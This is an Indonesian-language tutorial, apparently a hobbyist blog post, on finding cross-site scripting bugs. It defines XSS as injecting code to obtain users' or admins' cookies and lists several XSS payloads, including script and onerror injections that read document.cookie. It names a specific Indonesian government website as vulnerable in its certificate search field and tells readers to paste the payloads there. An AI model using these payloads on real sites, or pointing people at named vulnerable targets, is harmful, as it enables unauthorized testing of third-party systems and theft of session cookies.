XSS (Cross-site scripting)

 YAH HALO SEMUA KEMBALI DENGAN SAYA MIMIN SAYA AKAN MEMBERI TUTORIAL MENGETAHUI BUG XSS PADA WEBSITE

APA SIH ITU XSS

Menurut Wikipedia 

XSS merupakan kependekan yang digunakan untuk istilah cross site scripting. XSS merupakan salah satu jenis serangan injeksi code. XSS dilakukan oleh penyerang dengan cara memasukkan kode HTML atau client script code lainnya ke suatu situs. Serangan ini akan seolah-olah datang dari situs tersebut.

Menurut saya xss adalah suntikan kode kepada suara website untuk mengetahui cookie pengguna maupun admin

Nah langsung saja ke tutorial nya yah

Saya kebetulan mempunyai target dan saya akan memberi tutorial nya cara mengetahui nya

Bahan²

Kouta

Payload

"><img src=x onerror=prompt(1)>

<h1>testtt</h1>

"><script>alert(document.cookie)</script>

<marquee>Subrek</marquee>

Nah saya sudah punya web yang vuln terhadap xss

https://reor.postel.go.id/

Website tersebut vuln terhadap kerentanan xss yang terdapat di colom search sertifikat

Caranya masuka Payload XSS di colom search sertifikat 

Dan boom cookie nya muncul

Saya cukup sekian saja dan terimakasih